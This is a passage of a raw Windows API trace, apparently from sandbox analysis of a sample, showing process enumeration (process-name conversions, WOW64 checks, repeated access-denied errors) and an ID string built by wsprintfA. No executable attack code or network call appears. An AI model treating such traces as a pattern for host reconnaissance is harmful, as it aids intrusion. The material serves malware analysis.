	[0133.404] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="cmd.exe", cchWideChar=7, lpMultiByteStr=0x69d668, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="cmd.exe", lpUsedDefaultChar=0x0) returned 7
	[0133.404] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.404] CloseHandle (hObject=0x2dc) returned 1
	[0133.404] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SMSvcHost32.exe", cchWideChar=15, lpMultiByteStr=0x39b5970, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SMSvcHost32.exe", lpUsedDefaultChar=0x0) returned 15
	[0133.405] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.405] CloseHandle (hObject=0x2dc) returned 1
	[0133.405] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="conhost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b80, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="conhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.405] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.405] CloseHandle (hObject=0x2dc) returned 1
	[0133.405] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PING.EXE", cchWideChar=8, lpMultiByteStr=0x39b5c10, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PING.EXE", lpUsedDefaultChar=0x0) returned 8
	[0133.405] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.405] CloseHandle (hObject=0x2dc) returned 1
	[0133.406] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="backgroundTaskHost.exe", cchWideChar=22, lpMultiByteStr=0x399d128, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="backgroundTaskHost.exe", lpUsedDefaultChar=0x0) returned 22
	[0133.438] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="smss.exe", cchWideChar=8, lpMultiByteStr=0x39b5bb0, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smss.exe", lpUsedDefaultChar=0x0) returned 8
	[0133.439] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x39b5c10, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0133.439] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wininit.exe", cchWideChar=11, lpMultiByteStr=0x39b5a48, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wininit.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.439] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x39b5b08, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0133.439] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="winlogon.exe", cchWideChar=12, lpMultiByteStr=0x39b5970, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winlogon.exe", lpUsedDefaultChar=0x0) returned 12
	[0133.439] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="services.exe", cchWideChar=12, lpMultiByteStr=0x39b5c10, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="services.exe", lpUsedDefaultChar=0x0) returned 12
	[0133.440] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="lsass.exe", cchWideChar=9, lpMultiByteStr=0x39b5b98, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lsass.exe", lpUsedDefaultChar=0x0) returned 9
	[0133.440] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a48, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.440] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5c10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.440] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dwm.exe", cchWideChar=7, lpMultiByteStr=0x69d5d8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwm.exe", lpUsedDefaultChar=0x0) returned 7
	[0133.440] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.441] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b59e8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.441] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5970, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.441] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5c10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.441] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5c10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.442] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.442] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b80, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.442] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoolsv.exe", cchWideChar=11, lpMultiByteStr=0x39b59e8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoolsv.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.442] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.442] CloseHandle (hObject=0x2dc) returned 1
	[0133.442] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sihost.exe", cchWideChar=10, lpMultiByteStr=0x39b5b98, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sihost.exe", lpUsedDefaultChar=0x0) returned 10
	[0133.443] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a48, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.443] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=20, lpMultiByteStr=0x399d128, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 20
	[0133.443] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.443] CloseHandle (hObject=0x2dc) returned 1
	[0133.443] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="RuntimeBroker.exe", cchWideChar=17, lpMultiByteStr=0x399d188, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RuntimeBroker.exe", lpUsedDefaultChar=0x0) returned 17
	[0133.443] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5c10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.444] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.444] CloseHandle (hObject=0x2dc) returned 1
	[0133.444] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x39b5b98, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0133.444] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.444] CloseHandle (hObject=0x2dc) returned 1
	[0133.444] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="explorer.exe", cchWideChar=12, lpMultiByteStr=0x39b5b08, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="explorer.exe", lpUsedDefaultChar=0x0) returned 12
	[0133.444] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.445] CloseHandle (hObject=0x2dc) returned 1
	[0133.445] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x39b5970, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0133.445] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.445] CloseHandle (hObject=0x2dc) returned 1
	[0133.445] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=23, lpMultiByteStr=0x399d128, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShellExperienceHost.exe", lpUsedDefaultChar=0x0) returned 23
	[0133.445] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.445] CloseHandle (hObject=0x2dc) returned 1
	[0133.446] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SearchUI.exe", cchWideChar=12, lpMultiByteStr=0x39b5b08, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SearchUI.exe", lpUsedDefaultChar=0x0) returned 12
	[0133.446] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.446] CloseHandle (hObject=0x2dc) returned 1
	[0133.446] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dllhost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a48, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dllhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.446] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="audiodg.exe", cchWideChar=11, lpMultiByteStr=0x39b59e8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="audiodg.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.446] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.446] CloseHandle (hObject=0x2dc) returned 1
	[0133.447] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x39b5970, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0133.447] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.447] CloseHandle (hObject=0x2dc) returned 1
	[0133.447] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.447] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.447] CloseHandle (hObject=0x2dc) returned 1
	[0133.447] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="develop-patent.exe", cchWideChar=18, lpMultiByteStr=0x399d188, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="develop-patent.exe", lpUsedDefaultChar=0x0) returned 18
	[0133.448] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.448] CloseHandle (hObject=0x2dc) returned 1
	[0133.448] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="its.exe", cchWideChar=7, lpMultiByteStr=0x69d578, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="its.exe", lpUsedDefaultChar=0x0) returned 7
	[0133.448] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.448] CloseHandle (hObject=0x2dc) returned 1
	[0133.448] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="gently budapest.exe", cchWideChar=19, lpMultiByteStr=0x399d128, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gently budapest.exe", lpUsedDefaultChar=0x0) returned 19
	[0133.448] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.449] CloseHandle (hObject=0x2dc) returned 1
	[0133.449] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="thoroughlypriestprefix.exe", cchWideChar=26, lpMultiByteStr=0x39b9708, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="thoroughlypriestprefix.exe", lpUsedDefaultChar=0x0) returned 26
	[0133.449] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.449] CloseHandle (hObject=0x2dc) returned 1
	[0133.449] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="inserted_field.exe", cchWideChar=18, lpMultiByteStr=0x399d188, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="inserted_field.exe", lpUsedDefaultChar=0x0) returned 18
	[0133.449] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.449] CloseHandle (hObject=0x2dc) returned 1
	[0133.450] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="semi bay.exe", cchWideChar=12, lpMultiByteStr=0x39b5b80, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="semi bay.exe", lpUsedDefaultChar=0x0) returned 12
	[0133.450] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.450] CloseHandle (hObject=0x2dc) returned 1
	[0133.450] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="outdoor.exe", cchWideChar=11, lpMultiByteStr=0x39b59e8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="outdoor.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.450] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.450] CloseHandle (hObject=0x2dc) returned 1
	[0133.450] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wool-parish-horses.exe", cchWideChar=22, lpMultiByteStr=0x399d128, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wool-parish-horses.exe", lpUsedDefaultChar=0x0) returned 22
	[0133.451] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.451] CloseHandle (hObject=0x2dc) returned 1
	[0133.451] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoken-delayed.exe", cchWideChar=18, lpMultiByteStr=0x399d128, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoken-delayed.exe", lpUsedDefaultChar=0x0) returned 18
	[0133.451] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.451] CloseHandle (hObject=0x2dc) returned 1
	[0133.451] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spokesman.exe", cchWideChar=13, lpMultiByteStr=0x39b5b80, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spokesman.exe", lpUsedDefaultChar=0x0) returned 13
	[0133.451] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.452] CloseHandle (hObject=0x2dc) returned 1
	[0133.452] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="oxide.exe", cchWideChar=9, lpMultiByteStr=0x39b5b80, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oxide.exe", lpUsedDefaultChar=0x0) returned 9
	[0133.452] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.452] CloseHandle (hObject=0x2dc) returned 1
	[0133.452] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="off-covered-playlist.exe", cchWideChar=24, lpMultiByteStr=0x39b9938, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="off-covered-playlist.exe", lpUsedDefaultChar=0x0) returned 24
	[0133.452] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.452] CloseHandle (hObject=0x2dc) returned 1
	[0133.453] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bryant.exe", cchWideChar=10, lpMultiByteStr=0x39b5b50, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bryant.exe", lpUsedDefaultChar=0x0) returned 10
	[0133.453] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.453] CloseHandle (hObject=0x2dc) returned 1
	[0133.453] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="postal-fool.exe", cchWideChar=15, lpMultiByteStr=0x39b5a78, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="postal-fool.exe", lpUsedDefaultChar=0x0) returned 15
	[0133.453] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.453] CloseHandle (hObject=0x2dc) returned 1
	[0133.454] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="crm_remarks_ctrl.exe", cchWideChar=20, lpMultiByteStr=0x399d128, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="crm_remarks_ctrl.exe", lpUsedDefaultChar=0x0) returned 20
	[0133.454] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.454] CloseHandle (hObject=0x2dc) returned 1
	[0133.454] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="volunteer.exe", cchWideChar=13, lpMultiByteStr=0x39b5b08, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="volunteer.exe", lpUsedDefaultChar=0x0) returned 13
	[0133.454] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.454] CloseHandle (hObject=0x2dc) returned 1
	[0133.454] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ranger_tu_community.exe", cchWideChar=23, lpMultiByteStr=0x399d128, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ranger_tu_community.exe", lpUsedDefaultChar=0x0) returned 23
	[0133.455] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.455] CloseHandle (hObject=0x2dc) returned 1
	[0133.455] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="eddie_cholesterol_reprint.exe", cchWideChar=29, lpMultiByteStr=0x39b97a8, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eddie_cholesterol_reprint.exe", lpUsedDefaultChar=0x0) returned 29
	[0133.455] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.455] CloseHandle (hObject=0x2dc) returned 1
	[0133.455] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bracket-natural-chancellor.exe", cchWideChar=30, lpMultiByteStr=0x39b9af0, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bracket-natural-chancellor.exe", lpUsedDefaultChar=0x0) returned 30
	[0133.455] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.455] CloseHandle (hObject=0x2dc) returned 1
	[0133.456] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="safari.exe", cchWideChar=10, lpMultiByteStr=0x39b5a48, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="safari.exe", lpUsedDefaultChar=0x0) returned 10
	[0133.456] GetLastError () returned 0x5
	[0133.456] GetLastError () returned 0x5
	[0133.456] GetLastError () returned 0x5
	[0133.456] GetLastError () returned 0x5
	[0133.456] GetLastError () returned 0x5
	[0133.456] GetLastError () returned 0x5
	[0133.456] GetLastError () returned 0x5
	[0133.456] GetLastError () returned 0x5
	[0133.456] GetLastError () returned 0x5
	[0133.456] GetLastError () returned 0x5
	[0133.456] GetLastError () returned 0x5
	[0133.456] GetLastError () returned 0x5
	[0133.456] GetLastError () returned 0x5
	[0133.456] GetLastError () returned 0x5
	[0133.456] GetLastError () returned 0x5
	[0133.456] GetLastError () returned 0x5
	[0133.456] GetLastError () returned 0x5
	[0133.456] GetLastError () returned 0x5
	[0133.456] GetLastError () returned 0x5
	[0133.456] GetLastError () returned 0x5
	[0133.456] GetLastError () returned 0x5
	[0133.456] GetLastError () returned 0x5
	[0133.456] GetLastError () returned 0x5
	[0133.456] GetLastError () returned 0x5
	[0133.456] GetLastError () returned 0x5
	[0133.456] GetLastError () returned 0x5
	[0133.456] GetLastError () returned 0x5
	[0133.456] GetLastError () returned 0x5
	[0133.456] GetLastError () returned 0x5
	[0133.456] GetLastError () returned 0x5
	[0133.456] GetLastError () returned 0x5
	[0133.456] GetLastError () returned 0x5
	[0133.456] GetLastError () returned 0x5
	[0133.457] GetLastError () returned 0x5
	[0133.457] GetLastError () returned 0x5
	[0133.457] GetLastError () returned 0x5
	[0133.457] GetLastError () returned 0x5
	[0133.457] GetLastError () returned 0x5
	[0133.457] GetLastError () returned 0x5
	[0133.457] GetLastError () returned 0x5
	[0133.457] GetLastError () returned 0x5
	[0133.457] GetLastError () returned 0x5
	[0133.457] GetLastError () returned 0x5
	[0133.457] GetLastError () returned 0x5
	[0133.457] GetLastError () returned 0x5
	[0133.457] GetLastError () returned 0x5
	[0133.457] GetLastError () returned 0x5
	[0133.457] GetLastError () returned 0x5
	[0133.457] GetLastError () returned 0x5
	[0133.457] GetLastError () returned 0x5
	[0133.457] GetLastError () returned 0x5
	[0133.457] GetLastError () returned 0x5
	[0133.457] GetLastError () returned 0x5
	[0133.457] GetLastError () returned 0x5
	[0133.457] GetLastError () returned 0x5
	[0133.457] GetLastError () returned 0x5
	[0133.457] GetLastError () returned 0x5
	[0133.457] GetLastError () returned 0x5
	[0133.457] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0133.457] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0133.457] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0133.458] GetLastError () returned 0x5
	[0133.458] GetLastError () returned 0x5
	[0133.458] GetLastError () returned 0x5
	[0133.458] GetLastError () returned 0x5
	[0133.458] GetLastError () returned 0x5
	[0133.458] GetLastError () returned 0x5
	[0133.458] GetLastError () returned 0x5
	[0133.458] GetLastError () returned 0x5
	[0133.458] GetLastError () returned 0x5
	[0133.458] GetLastError () returned 0x5
	[0133.458] GetLastError () returned 0x5
	[0133.458] GetLastError () returned 0x5
	[0133.458] GetLastError () returned 0x5
	[0133.458] GetLastError () returned 0x5
	[0133.458] GetLastError () returned 0x5
	[0133.458] GetLastError () returned 0x5
	[0133.458] GetLastError () returned 0x5
	[0133.458] GetLastError () returned 0x5
	[0133.458] GetLastError () returned 0x5
	[0133.458] GetLastError () returned 0x5
	[0133.458] GetLastError () returned 0x5
	[0133.458] GetLastError () returned 0x5
	[0133.458] GetLastError () returned 0x5
	[0133.458] GetLastError () returned 0x5
	[0133.458] GetLastError () returned 0x5
	[0133.458] GetLastError () returned 0x5
	[0133.458] wsprintfA (in: param_1=0x39938f8, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0133.458] GetLastError () returned 0x5
	[0133.458] GetLastError () returned 0x5
	[0133.458] GetLastError () returned 0x5
	[0133.458] GetLastError () returned 0x5
	[0133.458] GetLastError () returned 0x5
	[0133.458] GetLastError () returned 0x5
	[0133.458] GetLastError () returned 0x5
	[0133.458] GetLastError () returned 0x5
	[0133.458] GetLastError () returned 0x5
	[0133.458] GetLastError () returned 0x5
	[0133.458] GetLastError () returned 0x5
	[0133.458] GetLastError () returned 0x5
	[0133.458] GetLastError () returned 0x5
	[0133.458] GetLastError () returned 0x5
	[0133.458] GetLastError () returned 0x5
	[0133.458] GetLastError () returned 0x5
	[0133.458] GetLastError () returned 0x5
	[0133.458] GetLastError () returned 0x5
	[0133.458] GetLastError () returned 0x5
	[0133.458] GetLastError () returned 0x5
	[0133.458] GetLastError () returned 0x5
